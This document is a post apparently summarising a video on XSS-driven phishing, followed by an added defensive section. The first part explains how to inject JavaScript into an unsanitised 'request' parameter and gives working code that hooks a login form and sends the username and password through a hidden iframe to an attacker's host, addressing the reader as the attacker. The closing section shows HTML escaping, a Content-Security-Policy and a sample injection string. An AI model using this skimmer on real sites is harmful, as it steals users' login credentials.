XSS is certainly changing the way that phishing attacks are perpetrated.
This controversial video is by Brian Contos, CISSP, from a company named Imperva. It walks through each step involved in finding an XSS vulnerability in a web page and showcases some of the basic steps that you need to know.
For example, we have a target such as:
http://Thewebsite.com/google/add.php?request=
Suppose there is a login form and an XSS vulnerability in the same page.
In order to perpetrate the phishing attack, one needs to inject JavaScript code into the variable so that the victim’s browser loads a JavaScript file.
From a brief analysis of the HTML that the site generates, I know that:
• The value that the variable “request” receives is not sanitized at all.
• The login form is named “login_clientes”.
• The login form has two input fields for user data: “user” and “pass”.
So I will use the following JavaScript code:
loginForm = document.forms['login_clientes'];
function parseData()
{
    var username = loginForm.user.value;
    var password = loginForm.pass.value;
    saveData(username,password);
    return true;
}
function saveData(username,password)
{
    var frame=document.createElement('iframe');
    frame.src="http://myhost/myparsefile.php?username=" + username + "&password=" + password;
    frame.style.display='none';
    document.body.appendChild(frame);
}
loginForm.onsubmit = parseData;
So, when someone browses to a page like this (don’t forget to encode the injected part):
http://Thewebsite.com/google/add.php?request=
A victim will give you his personal data, as long as he clicks the Submit button.
The ideas to keep in mind are:
• If you can make the user’s browser load your JavaScript file or code when visiting some site, you can change that site’s behavior.
• If a site has forms and XSS vulnerabilities, you can try to get the data the user inputs.
• If the user trusts the site, the user will probably give his personal data anywhere on that site.
And if the site has vulnerabilities in some page where it doesn’t have forms, and has some form(s) in other page(s).
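Seen from the site owner's side, the attack above depends on the "request" value reaching the page unencoded and on the browser being allowed to run injected script and load an off-site frame. The following is an added example, not part of the original post or video: it encodes the reflected value for HTML and sends a Content-Security-Policy that keeps scripts, frames and form targets on the site's own origin. The renderAddPage helper, the /login action and the sample value are assumptions made for illustration.

```javascript
// Added defensive example (not from the original post). The helper names,
// the /login action and the sample input are assumptions for illustration.

// Encode a value for an HTML text or quoted-attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Policy aimed at what the injected script in the post relies on.
function buildCsp() {
  return [
    "default-src 'self'",
    "script-src 'self'",   // no inline script, no script file from another host
    "frame-src 'self'",    // a hidden iframe cannot load an off-site URL
    "form-action 'self'",  // forms can only submit back to this origin
    "base-uri 'none'",
  ].join('; ');
}

// Render the page that reflects "request", with the login form from the post.
function renderAddPage(query) {
  // Repeated parameters arrive as arrays in many frameworks; accept strings only.
  const request = typeof query.request === 'string' ? query.request : '';
  const body =
    '<!doctype html><html><body>' +
    '<p>You asked for: ' + escapeHtml(request) + '</p>' +
    '<form name="login_clientes" method="post" action="/login">' +
    '<input name="user"><input name="pass" type="password">' +
    '<input type="submit"></form></body></html>';
  return {
    headers: {
      'Content-Type': 'text/html; charset=utf-8',
      'Content-Security-Policy': buildCsp(),
      'X-Content-Type-Options': 'nosniff',
    },
    body,
  };
}

// Constructed sample input: a value that tries to break out into markup.
const sample = { request: '"><script src="//attacker.invalid/x.js"></script>' };
const page = renderAddPage(sample);
console.log(page.headers['Content-Security-Policy']);
console.log(page.body.includes('<script') ? 'markup injected' : 'value rendered as text');
```

Output encoding is the fix for the flaw itself; the policy header is a second layer that limits what a missed injection point elsewhere on the site could do.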